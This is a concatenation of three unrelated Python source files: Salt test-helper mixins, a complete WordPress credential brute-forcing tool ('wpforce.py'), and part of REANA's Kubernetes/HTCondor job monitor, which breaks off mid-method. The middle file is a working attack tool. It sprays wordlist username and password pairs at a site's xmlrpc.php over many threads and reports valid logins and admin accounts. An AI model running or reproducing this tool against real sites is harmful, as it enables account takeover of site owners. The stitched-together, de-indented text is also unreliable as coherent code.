Mix-in class that provides a ``client`` attribute which returns a Salt
:class:`LocalClient<salt:salt.client.LocalClient>`.
.. code-block:: python
class LocalClientTestCase(TestCase, SaltClientTestCaseMixin):
def test_check_pub_data(self):
just_minions = {'minions': ['m1', 'm2']}
jid_no_minions = {'jid': '1234', 'minions': []}
valid_pub_data = {'minions': ['m1', 'm2'], 'jid': '1234'}
self.assertRaises(EauthAuthenticationError,
self.client._check_pub_data, None)
self.assertDictEqual({},
self.client._check_pub_data(just_minions),
'Did not handle lack of jid correctly')
self.assertDictEqual(
{},
self.client._check_pub_data({'jid': '0'}),
'Passing JID of zero is not handled gracefully')
'''
_salt_client_config_file_name_ = 'master'
@property
def client(self):
# Late import
import salt.client
if 'runtime_client' not in RUNTIME_VARS.RUNTIME_CONFIGS:
mopts = self.get_config(self._salt_client_config_file_name_, from_scratch=True)
RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(mopts=mopts)
return RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client']
class ShellCaseCommonTestsMixin(CheckShellBinaryNameAndVersionMixin):
_call_binary_expected_version_ = salt.version.__version__
def test_salt_with_git_version(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
from salt.version import __version_info__, SaltStackVersion
git = salt.utils.path.which('git')
if not git:
self.skipTest('The git binary is not available')
opts = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'cwd': CODE_DIR,
}
if not salt.utils.platform.is_windows():
opts['close_fds'] = True
# Let's get the output of git describe
process = subprocess.Popen(
[git, 'describe', '--tags', '--first-parent', '--match', 'v[0-9]*'],
**opts
)
out, err = process.communicate()
if process.returncode != 0:
process = subprocess.Popen(
[git, 'describe', '--tags', '--match', 'v[0-9]*'],
**opts
)
out, err = process.communicate()
if not out:
self.skipTest(
'Failed to get the output of \'git describe\'. '
'Error: \'{0}\''.format(
salt.utils.stringutils.to_str(err)
)
)
parsed_version = SaltStackVersion.parse(out)
if parsed_version.info < __version_info__:
self.skipTest(
'We\'re likely about to release a new version. This test '
'would fail. Parsed(\'{0}\') < Expected(\'{1}\')'.format(
parsed_version.info, __version_info__
)
)
elif parsed_version.info != __version_info__:
self.skipTest(
'In order to get the proper salt version with the '
'git hash you need to update salt\'s local git '
'tags. Something like: \'git fetch --tags\' or '
'\'git fetch --tags upstream\' if you followed '
'salt\'s contribute documentation. The version '
'string WILL NOT include the git hash.'
)
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(parsed_version.string, out)
class _FixLoaderModuleMockMixinMroOrder(type):
'''
This metaclass will make sure that LoaderModuleMockMixin will always come as the first
base class in order for LoaderModuleMockMixin.setUp to actually run
'''
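    # Illustrative (hypothetical) effect: a class declared as
    #     class MyTestCase(TestCase, LoaderModuleMockMixin): ...
    # is created with its bases reordered to (LoaderModuleMockMixin, TestCase),
    # after which its setUp is wrapped by __setup_loader_modules_mocks__ below.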
def __new__(mcs, cls_name, cls_bases, cls_dict):
if cls_name == 'LoaderModuleMockMixin':
return super(_FixLoaderModuleMockMixinMroOrder, mcs).__new__(mcs, cls_name, cls_bases, cls_dict)
bases = list(cls_bases)
for idx, base in enumerate(bases):
if base.__name__ == 'LoaderModuleMockMixin':
bases.insert(0, bases.pop(idx))
break
# Create the class instance
instance = super(_FixLoaderModuleMockMixinMroOrder, mcs).__new__(mcs, cls_name, tuple(bases), cls_dict)
# Apply our setUp function decorator
instance.setUp = LoaderModuleMockMixin.__setup_loader_modules_mocks__(instance.setUp)
return instance
class LoaderModuleMockMixin(six.with_metaclass(_FixLoaderModuleMockMixinMroOrder, object)):
'''
    This class will set up the salt loader dunders.
    Please check `setup_loader_modules` below.
'''
# Define our setUp function decorator
@staticmethod
def __setup_loader_modules_mocks__(setup_func):
@functools.wraps(setup_func)
def wrapper(self):
if NO_MOCK:
self.skipTest(NO_MOCK_REASON)
loader_modules_configs = self.setup_loader_modules()
if not isinstance(loader_modules_configs, dict):
raise RuntimeError(
'{}.setup_loader_modules() must return a dictionary where the keys are the '
'modules that require loader mocking setup and the values, the global module '
                    'variables for each of the modules being mocked. For example \'__salt__\', '
'\'__opts__\', etc.'.format(self.__class__.__name__)
)
salt_dunders = (
'__opts__', '__salt__', '__runner__', '__context__', '__utils__',
'__ext_pillar__', '__thorium__', '__states__', '__serializers__', '__ret__',
'__grains__', '__pillar__', '__sdb__',
# Proxy is commented out on purpose since some code in salt expects a NameError
# and is most of the time not a required dunder
# '__proxy__'
)
for module, module_globals in six.iteritems(loader_modules_configs):
if not isinstance(module, types.ModuleType):
raise RuntimeError(
'The dictionary keys returned by {}.setup_loader_modules() '
'must be an imported module, not {}'.format(
self.__class__.__name__,
type(module)
)
)
if not isinstance(module_globals, dict):
raise RuntimeError(
'The dictionary values returned by {}.setup_loader_modules() '
'must be a dictionary, not {}'.format(
self.__class__.__name__,
type(module_globals)
)
)
module_blacklisted_dunders = module_globals.pop('blacklisted_dunders', ())
minion_funcs = {}
if '__salt__' in module_globals and module_globals['__salt__'] == 'autoload':
if '__opts__' not in module_globals:
raise RuntimeError(
'You must provide \'__opts__\' on the {} module globals dictionary '
'to auto load the minion functions'.format(module.__name__)
)
import salt.loader
ctx = {}
if '__utils__' not in module_globals:
utils = salt.loader.utils(module_globals['__opts__'],
context=module_globals.get('__context__') or ctx)
module_globals['__utils__'] = utils
minion_funcs = salt.loader.minion_mods(
module_globals['__opts__'],
context=module_globals.get('__context__') or ctx,
utils=module_globals.get('__utils__'),
)
module_globals['__salt__'] = minion_funcs
for dunder_name in salt_dunders:
if dunder_name not in module_globals:
if dunder_name in module_blacklisted_dunders:
continue
module_globals[dunder_name] = {}
sys_modules = module_globals.pop('sys.modules', None)
if sys_modules is not None:
if not isinstance(sys_modules, dict):
raise RuntimeError(
'\'sys.modules\' must be a dictionary not: {}'.format(
type(sys_modules)
)
)
patcher = patch.dict(sys.modules, sys_modules)
patcher.start()
def cleanup_sys_modules(patcher, sys_modules):
patcher.stop()
del patcher
del sys_modules
self.addCleanup(cleanup_sys_modules, patcher, sys_modules)
for key in module_globals:
if not hasattr(module, key):
if key in salt_dunders:
setattr(module, key, {})
else:
setattr(module, key, None)
if module_globals:
patcher = patch.multiple(module, **module_globals)
patcher.start()
def cleanup_module_globals(patcher, module_globals):
patcher.stop()
del patcher
del module_globals
self.addCleanup(cleanup_module_globals, patcher, module_globals)
if minion_funcs:
# Since we autoloaded the minion_funcs, let's namespace the functions with the globals
# used to patch above
import salt.utils
for func in minion_funcs:
minion_funcs[func] = salt.utils.functools.namespaced_function(
minion_funcs[func],
module_globals,
preserve_context=True
)
return setup_func(self)
return wrapper
def setup_loader_modules(self):
raise NotImplementedError(
'\'{}.setup_loader_modules()\' must be implemented'.format(self.__class__.__name__)
)
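    # A minimal override sketch (hypothetical values, not taken from this file):
    #
    #     def setup_loader_modules(self):
    #         import salt.modules.cmdmod as cmdmod
    #         return {cmdmod: {'__opts__': {'test': True}}}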
class XMLEqualityMixin(object):
def assertEqualXML(self, e1, e2):
if six.PY3 and isinstance(e1, bytes):
e1 = e1.decode('utf-8')
if six.PY3 and isinstance(e2, bytes):
e2 = e2.decode('utf-8')
if isinstance(e1, six.string_types):
e1 = etree.XML(e1)
if isinstance(e2, six.string_types):
e2 = etree.XML(e2)
if e1.tag != e2.tag:
return False
if e1.text != e2.text:
return False
if e1.tail != e2.tail:
return False
if e1.attrib != e2.attrib:
return False
if len(e1) != len(e2):
return False
return all(self.assertEqualXML(c1, c2) for c1, c2 in zip(e1, e2))
class SaltReturnAssertsMixin(object):
def assertReturnSaltType(self, ret):
try:
self.assertTrue(isinstance(ret, dict))
except AssertionError:
raise AssertionError(
'{0} is not dict. Salt returned: {1}'.format(
type(ret).__name__, ret
)
)
def assertReturnNonEmptySaltType(self, ret):
self.assertReturnSaltType(ret)
try:
self.assertNotEqual(ret, {})
except AssertionError:
raise AssertionError(
                '{} is equal to {}. Salt returned an empty dictionary.'.format(ret, {})
)
def __return_valid_keys(self, keys):
if isinstance(keys, tuple):
# If it's a tuple, turn it into a list
keys = list(keys)
elif isinstance(keys, six.string_types):
# If it's a string, make it a one item list
keys = [keys]
elif not isinstance(keys, list):
# If we've reached here, it's a bad type passed to keys
raise RuntimeError('The passed keys need to be a list')
return keys
def __getWithinSaltReturn(self, ret, keys):
self.assertReturnNonEmptySaltType(ret)
ret_data = []
for part in six.itervalues(ret):
keys = self.__return_valid_keys(keys)
okeys = keys[:]
try:
ret_item = part[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[\'{0}\']'.format(k) for k in keys]), part
)
)
while okeys:
try:
ret_item = ret_item[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[\'{0}\']'.format(k) for k in keys]), part
)
)
ret_data.append(ret_item)
return ret_data
def assertSaltTrueReturn(self, ret):
try:
for saltret in self.__getWithinSaltReturn(ret, 'result'):
self.assertTrue(saltret)
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not True. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned:\n{0}'.format(
pprint.pformat(ret)
)
)
def assertSaltFalseReturn(self, ret):
try:
for saltret in self.__getWithinSaltReturn(ret, 'result'):
self.assertFalse(saltret)
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not False. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltNoneReturn(self, ret):
try:
for saltret in self.__getWithinSaltReturn(ret, 'result'):
self.assertIsNone(saltret)
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not None. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertInSaltComment(self, in_comment, ret):
for saltret in self.__getWithinSaltReturn(ret, 'comment'):
self.assertIn(in_comment, saltret)
def assertNotInSaltComment(self, not_in_comment, ret):
for saltret in self.__getWithinSaltReturn(ret, 'comment'):
self.assertNotIn(not_in_comment, saltret)
def assertSaltCommentRegexpMatches(self, ret, pattern):
return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')
def assertInSaltStateWarning(self, in_comment, ret):
for saltret in self.__getWithinSaltReturn(ret, 'warnings'):
self.assertIn(in_comment, saltret)
def assertNotInSaltStateWarning(self, not_in_comment, ret):
for saltret in self.__getWithinSaltReturn(ret, 'warnings'):
self.assertNotIn(not_in_comment, saltret)
def assertInSaltReturn(self, item_to_check, ret, keys):
for saltret in self.__getWithinSaltReturn(ret, keys):
self.assertIn(item_to_check, saltret)
def assertNotInSaltReturn(self, item_to_check, ret, keys):
for saltret in self.__getWithinSaltReturn(ret, keys):
self.assertNotIn(item_to_check, saltret)
def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
for saltret in self.__getWithinSaltReturn(ret, keys):
self.assertRegex(saltret, pattern)
def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
for saltret in self.__getWithinSaltReturn(ret, keys):
self.assertEqual(saltret, comparison)
def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
for saltret in self.__getWithinSaltReturn(ret, keys):
self.assertNotEqual(saltret, comparison)
def _fetch_events(q):
'''
Collect events and store them
'''
def _clean_queue():
print('Cleaning queue!')
while not q.empty():
queue_item = q.get()
queue_item.task_done()
atexit.register(_clean_queue)
a_config = AdaptedConfigurationTestCaseMixin()
event = salt.utils.event.get_event('minion', sock_dir=a_config.get_config('minion')['sock_dir'], opts=a_config.get_config('minion'))
while True:
try:
events = event.get_event(full=False)
except Exception:
# This is broad but we'll see all kinds of issues right now
# if we drop the proc out from under the socket while we're reading
pass
q.put(events)
class SaltMinionEventAssertsMixin(object):
'''
Asserts to verify that a given event was seen
'''
def __new__(cls, *args, **kwargs):
# We have to cross-call to re-gen a config
cls.q = multiprocessing.Queue()
cls.fetch_proc = salt.utils.process.SignalHandlingMultiprocessingProcess(
target=_fetch_events, args=(cls.q,)
)
cls.fetch_proc.start()
return object.__new__(cls)
def __exit__(self, *args, **kwargs):
self.fetch_proc.join()
def assertMinionEventFired(self, tag):
#TODO
raise salt.exceptions.NotImplemented('assertMinionEventFired() not implemented')
def assertMinionEventReceived(self, desired_event):
queue_wait = 5 # 2.5s
while self.q.empty():
time.sleep(0.5) # Wait for events to be pushed into the queue
queue_wait -= 1
if queue_wait <= 0:
raise AssertionError('Queue wait timer expired')
while not self.q.empty(): # This is not thread-safe and may be inaccurate
event = self.q.get()
if isinstance(event, dict):
event.pop('_stamp')
if desired_event == event:
self.fetch_proc.terminate()
return True
self.fetch_proc.terminate()
raise AssertionError('Event {0} was not received by minion'.format(desired_event))
|
wpforce.py
|
import re
import sys
import time
import socket
import urllib2
import argparse
import threading
from urlparse import urljoin
__author__ = 'n00py'
# These variables must be shared by all threads dynamically
correct_pairs = {}
total = 0
def has_colours(stream):
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # auto color only on TTYs
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
return False
has_colours = has_colours(sys.stdout)
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
def printout(text, colour=WHITE):
if has_colours:
seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m"
sys.stdout.write(seq)
else:
sys.stdout.write(text)
def slice_list(input, size):
input_size = len(input)
slice_size = input_size / size
remain = input_size % size
result = []
iterator = iter(input)
for i in range(size):
result.append([])
for j in range(slice_size):
result[i].append(iterator.next())
if remain:
result[i].append(iterator.next())
remain -= 1
return result
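# For example (illustrative): slice_list(["a", "b", "c", "d", "e"], 2) -> [["a", "b", "c"], ["d", "e"]]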
def worker(wordlist,thread_no,url,userlist,verbose,debug,agent):
global total
global correct_pairs
for n in wordlist:
current_pass = wordlist.index(n)
for x in userlist:
current_user = userlist.index(x)
user = userlist[current_user]
password = wordlist[current_pass]
if user not in correct_pairs:
if user != "":
if password != "":
PasswordAttempt(user,password,url,thread_no,verbose,debug,agent)
total += 1
def BuildThreads(list_array,url,debug,userlist,verbose,agent):
if debug:
print "Here is the content of the wordlists for each thread"
for i in range(len(list_array)):
print "Thread " + str(i)
printout(str(list_array[i]), YELLOW)
print "\n-----------------------------------------------------"
threads = []
for i in range(len(list_array)):
t = threading.Thread(target=worker, args=(list_array[i], i, url,userlist,verbose,debug,agent))
t.daemon = True
threads.append(t)
t.start()
def PrintBanner(input,wordlist,url,userlist,passlist):
banner = """\
,-~~-.___. __ __ ____ _____
/ | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___
( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \.
\_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/
==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___|
/ \-'~; || | v.1.0.0
/ __/~| ...||__/|-" Brute Force Attack Tool for Wordpress
=( _____||________| ~n00py~
"""
print banner
print ("Username List: %s" % input) + " (" + str(len(userlist)) + ")"
print ("Password List: %s" % wordlist) + " (" + str(len(passlist)) + ")"
print ("URL: %s" % url)
def TestSite(url):
protocheck(url)
print "Trying: " + url
try:
urllib2.urlopen(url, timeout=3)
except urllib2.HTTPError, e:
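        # A plain GET against xmlrpc.php typically yields 405 (Method Not Allowed) when the
        # endpoint is present, while 404 means it has been moved, removed, or blocked.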
if e.code == 405:
print url + " found!"
print "Now the brute force will begin! >:)"
if e.code == 404:
printout(str(e), YELLOW)
print " - XMLRPC has been moved, removed, or blocked"
sys.exit()
except urllib2.URLError, g:
printout("Could not identify XMLRPC. Please verify the domain.\n", YELLOW)
sys.exit()
except socket.timeout as e:
print type(e)
printout("The socket timed out, try it again.", YELLOW)
sys.exit()
def PasswordAttempt(user, password, url, thread_no,verbose,debug,agent):
global passlist
if verbose is True or debug is True:
if debug is True:
thready = "[Thread " + str(thread_no) + "]"
printout(thready, YELLOW)
print "Trying " + user + " : " + password + "\n",
headers = {'User-Agent': agent,
'Connection': 'keep-alive',
'Accept': 'text/html'
}
post = "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>" + user + "</string></value></param><param><value><string>" + password + "</string></value></param></params></methodCall>"
try:
req = urllib2.Request(url, post, headers)
response = urllib2.urlopen(req, timeout=3)
the_page = response.read()
look_for = "isAdmin"
try:
splitter = the_page.split(look_for, 1)[1]
correct_pairs[user] = password
print "--------------------------"
success = "[" + user + " : " + password + "] are valid credentials! "
adminAlert = ""
if splitter[23] == "1":
adminAlert = "- THIS ACCOUNT IS ADMIN"
printout(success, GREEN)
printout(adminAlert, RED)
print "\n--------------------------"
except:
pass
except urllib2.URLError, e:
if e.code == 404 or e.code == 403:
global total
printout(str(e), YELLOW)
print " - WAF or security plugin likely in use"
total = len(passlist)
sys.exit()
else:
printout(str(e), YELLOW)
print " - Try reducing Thread count "
if args.verbose is True or args.debug is True:
print user + ":" + password + " was skipped"
except socket.timeout as e:
printout(str(e), YELLOW)
print " - Try reducing Thread count "
if args.verbose is True or args.debug is True:
print user + ":" + password + " was skipped"
except socket.error as e:
printout(str(e), YELLOW)
print " - Got an RST, Probably tripped the firewall\n",
total = len(passlist)
sys.exit()
def protocheck(url):
url_pattern = re.compile("http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+")
if not url_pattern.match(url):
printout("Incorrect URL. Please include the protocol in the URL.\n", YELLOW)
sys.exit()
def main():
    parser = argparse.ArgumentParser(description='This is a tool to brute force Wordpress using the Wordpress API')
users = parser.add_mutually_exclusive_group(required=True)
users.add_argument('-i','--input', help='Input file name')
    users.add_argument('-si', '--singleinput', help='Input list of users', action='store', dest='singleinput', nargs='+')
parser.add_argument('-w','--wordlist',help='Wordlist file name', required=True)
parser.add_argument('-u','--url',help='URL of target', required=True)
    parser.add_argument('-v','--verbose',help=' Verbose output. Show the attempts as they happen.', required=False, action='store_true')
parser.add_argument('-t','--threads',help=' Determines the number of threads to be used, default is 10', type=int, default=10, required=False)
parser.add_argument('-a','--agent',help=' Determines the user-agent', type=str, default="WPForce Wordpress Attack Tool 1.0", required=False)
parser.add_argument('-d','--debug',help=' This option is used for determining issues with the script.', action='store_true', required=False)
args = parser.parse_args()
url = args.url
url = urljoin(url, 'xmlrpc.php')
if args.input:
userlist = open(args.input, 'r').read().split('\n')
else:
printout("Remember to pass usernames in space delimited form!\n", YELLOW)
userlist = args.singleinput
totalusers = len(userlist)
passlist = open(args.wordlist, 'r').read().split('\n')
PrintBanner(args.input,args.wordlist,args.url,userlist,passlist)
TestSite(url)
list_array = slice_list(passlist, args.threads)
BuildThreads(list_array,url,args.debug,userlist,args.verbose,args.agent)
while (len(correct_pairs) <= totalusers) and (len(passlist) > total):
time.sleep(0.1)
sys.stdout.flush()
percent = "%.0f%%" % (100 * (total)/len(passlist))
print " " + percent + " Percent Complete\r",
print "\nAll correct pairs:"
printout(str(correct_pairs), GREEN)
print ""
if __name__ == "__main__":
main()
|
job_monitor.py
|
# -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2019, 2020, 2021, 2022 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Job monitoring wrapper."""
import logging
import threading
import time
import traceback
from typing import Optional, Dict
from kubernetes import client, watch
from reana_commons.config import REANA_RUNTIME_KUBERNETES_NAMESPACE
from reana_commons.k8s.api_client import current_k8s_corev1_api_client
from reana_db.database import Session
from reana_db.models import Job, JobStatus
from reana_job_controller.config import COMPUTE_BACKENDS
from reana_job_controller.job_db import JOB_DB
from reana_job_controller.utils import SSHClient, singleton
class JobMonitor:
"""Job monitor interface."""
def __init__(self, thread_name: str, app=None):
"""Initialize REANA job monitors."""
self.job_event_reader_thread = threading.Thread(
name=thread_name, target=self.watch_jobs, args=(JOB_DB, app)
)
self.job_event_reader_thread.daemon = True
self.job_event_reader_thread.start()
self.job_db = JOB_DB
def watch_jobs(self, job_db, app):
"""Monitor running jobs."""
raise NotImplementedError
@singleton
class JobMonitorKubernetes(JobMonitor):
"""Kubernetes job monitor."""
def __init__(self, workflow_uuid: Optional[str] = None, **kwargs):
"""Initialize Kubernetes job monitor thread."""
self.job_manager_cls = COMPUTE_BACKENDS["kubernetes"]()
self.workflow_uuid = workflow_uuid
super(__class__, self).__init__(thread_name="kubernetes_job_monitor")
def _get_remaining_jobs(
self, compute_backend="kubernetes", statuses_to_skip=None
) -> Dict[str, str]:
"""Get remaining jobs according to a set of conditions.
:param compute_backend: For which compute backend to search remaining
jobs.
:param statuses_to_skip: List of statuses to skip when searching for
remaining jobs.
:type compute_backend: str
:type statuses_to_skip: list
:return: Dictionary composed of backend IDs as keys and REANA job IDs
            as values.
:rtype: dict
"""
remaining_jobs = dict()
statuses_to_skip = statuses_to_skip or []
for job_id, job_dict in self.job_db.items():
is_remaining = (
not self.job_db[job_id]["deleted"]
and self.job_db[job_id]["compute_backend"] == compute_backend
and not self.job_db[job_id]["status"] in statuses_to_skip
)
if is_remaining:
remaining_jobs[job_dict["backend_job_id"]] = job_id
return remaining_jobs
def get_reana_job_id(self, backend_job_id: str) -> str:
"""Get REANA job ID."""
remaining_jobs = self._get_remaining_jobs()
return remaining_jobs[backend_job_id]
def get_backend_job_id(self, job_pod):
"""Get the backend job id for the backend object.
:param job_pod: Compute backend job object (Kubernetes V1Pod
https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/V1Pod.md)
:return: Backend job ID.
:rtype: str
"""
return job_pod.metadata.labels["job-name"]
def store_job_logs(self, reana_job_id, logs):
"""Store logs and update job status.
:param reana_job_id: Internal REANA job ID.
:param logs: Job logs.
:type reana_job_id: str
:type logs: str
"""
self.job_db[reana_job_id]["log"] = logs
store_logs(job_id=reana_job_id, logs=logs)
def update_job_status(self, reana_job_id, status):
"""Update job status inside RJC.
:param reana_job_id: Internal REANA job ID.
:param status: One of the possible status for jobs in REANA
:type reana_job_id: str
:type status: str
"""
self.job_db[reana_job_id]["status"] = status
def should_process_job(self, job_pod) -> bool:
"""Decide whether the job should be processed or not.
:param job_pod: Compute backend job object (Kubernetes V1Pod
https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/V1Pod.md)
"""
remaining_jobs = self._get_remaining_jobs(
statuses_to_skip=[JobStatus.finished.name, JobStatus.failed.name]
)
backend_job_id = self.get_backend_job_id(job_pod)
is_job_in_remaining_jobs = backend_job_id in remaining_jobs
job_status = self.get_job_status(job_pod)
is_job_completed = job_status in [
JobStatus.finished.name,
JobStatus.failed.name,
]
return (
is_job_in_remaining_jobs
and is_job_completed
and self._all_job_containers_not_running(job_pod)
)
@staticmethod
def _get_job_container_statuses(job_pod):
return (job_pod.status.container_statuses or []) + (
job_pod.status.init_container_statuses or []
)
def _all_job_containers_not_running(self, job_pod) -> bool:
return all(
not container.state.running
for container in self._get_job_container_statuses(job_pod)
)
def clean_job(self, job_id):
"""Clean up the created Kubernetes Job.
:param job_id: Kubernetes job ID.
"""
try:
logging.info("Cleaning Kubernetes job {} ...".format(job_id))
self.job_manager_cls.stop(job_id)
self.job_db[self.get_reana_job_id(job_id)]["deleted"] = True
except client.rest.ApiException as e:
logging.error("Error while connecting to Kubernetes API: {}".format(e))
except Exception as e:
logging.error(traceback.format_exc())
logging.error("Unexpected error: {}".format(e))
def get_job_status(self, job_pod) -> Optional[str]:
"""Get Kubernetes based REANA job status."""
status = None
backend_job_id = self.get_backend_job_id(job_pod)
if job_pod.status.phase == "Succeeded":
logging.info("Kubernetes job id: {} succeeded.".format(backend_job_id))
status = JobStatus.finished.name
elif job_pod.status.phase == "Failed":
logging.info("Kubernetes job id: {} failed.".format(backend_job_id))
status = JobStatus.failed.name
elif job_pod.status.phase == "Pending":
container_statuses = self._get_job_container_statuses(job_pod)
try:
for container in container_statuses:
reason = container.state.waiting.reason
if "ErrImagePull" in reason:
logging.info(
"Container {} in Kubernetes job {} "
"failed to fetch image.".format(
container.name, backend_job_id
)
)
status = JobStatus.failed.name
elif "InvalidImageName" in reason:
logging.info(
"Container {} in Kubernetes job {} "
"failed due to invalid image name.".format(
container.name, backend_job_id
)
)
status = JobStatus.failed.name
except (AttributeError, TypeError):
pass
return status
def _get_containers_logs(self, job_pod) -> Optional[str]:
try:
pod_logs = ""
container_statuses = self._get_job_container_statuses(job_pod)
logging.info(f"Grabbing pod {job_pod.metadata.name} logs ...")
for container in container_statuses:
if container.state.terminated:
container_log = current_k8s_corev1_api_client.read_namespaced_pod_log(
namespace=REANA_RUNTIME_KUBERNETES_NAMESPACE,
name=job_pod.metadata.name,
container=container.name,
)
pod_logs += "{}: :\n {}\n".format(container.name, container_log)
if hasattr(container.state.terminated, "reason"):
pod_logs += "\n{}\n".format(container.state.terminated.reason)
elif container.state.waiting:
pod_logs += "Container {} failed, error: {}".format(
container.name, container.state.waiting.message
)
return pod_logs
except client.rest.ApiException as e:
logging.error("Error while connecting to Kubernetes API: {}".format(e))
return None
except Exception as e:
logging.error(traceback.format_exc())
logging.error("Unexpected error: {}".format(e))
return None
def get_job_logs(self, job_pod) -> Optional[str]:
"""Get job logs."""
logs = self._get_containers_logs(job_pod)
if job_pod.status.reason == "DeadlineExceeded":
if not logs:
logs = ""
backend_job_id = self.get_backend_job_id(job_pod)
message = f"\n{job_pod.status.reason}\nThe job was killed due to exceeding timeout"
try:
specified_timeout = job_pod.spec.active_deadline_seconds
message += f" of {specified_timeout} seconds."
except AttributeError:
message += "."
logging.error(
f"Kubernetes job id: {backend_job_id}. Could not get job timeout from Job spec."
)
logs += message
logging.info(
f"Kubernetes job id: {backend_job_id} was killed due to timeout."
)
return logs
def watch_jobs(self, job_db, app=None):
"""Open stream connection to k8s apiserver to watch all jobs status.
:param job_db: Dictionary which contains all current jobs.
"""
while True:
logging.debug("Starting a new stream request to watch Jobs")
try:
w = watch.Watch()
for event in w.stream(
current_k8s_corev1_api_client.list_namespaced_pod,
namespace=REANA_RUNTIME_KUBERNETES_NAMESPACE,
label_selector=f"reana-run-job-workflow-uuid={self.workflow_uuid}",
):
logging.info("New Pod event received: {0}".format(event["type"]))
job_pod = event["object"]
if self.should_process_job(job_pod):
job_status = self.get_job_status(job_pod)
backend_job_id = self.get_backend_job_id(job_pod)
reana_job_id = self.get_reana_job_id(backend_job_id)
logs = self.get_job_logs(job_pod)
self.store_job_logs(reana_job_id, logs)
self.update_job_status(reana_job_id, job_status)
if JobStatus.should_cleanup_job(job_status):
self.clean_job(backend_job_id)
except client.rest.ApiException as e:
logging.error("Error while connecting to Kubernetes API: {}".format(e))
except Exception as e:
logging.error(traceback.format_exc())
logging.error("Unexpected error: {}".format(e))
condorJobStatus = {
"Unexpanded": 0,
"Idle": 1,
"Running": 2,
"Removed": 3,
"Completed": 4,
"Held": 5,
"Submission_Error": 6,
}
@singleton
class JobMonitorHTCondorCERN(JobMonitor):
"""HTCondor jobs monitor CERN."""
def __init__(self, app=None, **kwargs):
"""Initialize HTCondor job monitor thread."""
self.job_manager_cls = COMPUTE_BACKENDS["htcondorcern"]()
super(__class__, self).__init__(thread_name="htcondor_job_monitor", app=app)
def format_condor_job_que_query(self, backend_job_ids):
"""Format HTCondor job que query."""
base_query = "ClusterId == {} ||"
query = ""
for job_id in backend_job_ids:
query += base_query.format(job_id)
return query[:-2]
def watch_jobs(self, job_db, app):
"""Watch currently running HTCondor jobs.
:param job_db: Dictionary which contains all current jobs.
"""
ignore_hold_codes = [35, 16]
statuses_to_skip = ["finished", "failed"]
while True:
try:
logging.info("Starting a new stream request to watch Condor Jobs")
backend_job_ids = [
job_dict["backend_job_id"]
for id, job_dict in job_db.items()
if not job_db[id]["deleted"]
and job_db[id]["compute_backend"] == "htcondorcern"
]
future_condor_jobs = app.htcondor_executor.submit(
query_condor_jobs, app, backend_job_ids
)
condor_jobs = future_condor_jobs.result()
for job_id, job_dict in job_db.items():
if (
job_db[job_id]["deleted"]
or job_db[job_id]["compute_backend"] != "htcondorcern"
or job_db[job_id]["status"] in statuses_to_skip
):
continue
try:
condor_job = next(
job
for job in condor_jobs
if job["ClusterId"] == job_dict["backend_job_id"]
)
except Exception:
msg = "Job with id {} was not found in schedd.".format(
job_dict["backend_job_id"]
)
logging.error(msg)
future_job_history = app.htcondor_executor.submit(
self.job_manager_cls.find_job_in_history,
job_dict["backend_job_id"],
)
condor_job = future_job_history.result()
if condor_job:
msg = "Job was found in history. {}".format(str(condor_job))
logging.error(msg)
job_db[job_id]["status"] = "failed"
job_db[job_id]["log"] = msg
continue
if condor_job["JobStatus"] == condorJobStatus["Completed"]:
exit_code = condor_job.get(
"ExitCode", condor_job.get("ExitStatus")
)
if exit_code == 0:
job_db[job_id]["status"] = "finished"
else:
logging.info(
"Job job_id: {0}, condor_job_id: {1} "
"failed".format(job_id, condor_job["ClusterId"])
)
job_db[job_id]["status"] = "failed"
app.htcondor_executor.submit(
self.job_manager_cls.spool_output,
job_dict["backend_job_id"],
).result()
job_logs = app.htcondor_executor.submit(
self.job_manager_cls.get_logs,
job_dict["backend_job_id"],
job_db[job_id]["obj"].workflow_workspace,
)
job_db[job_id]["log"] = job_logs.result()
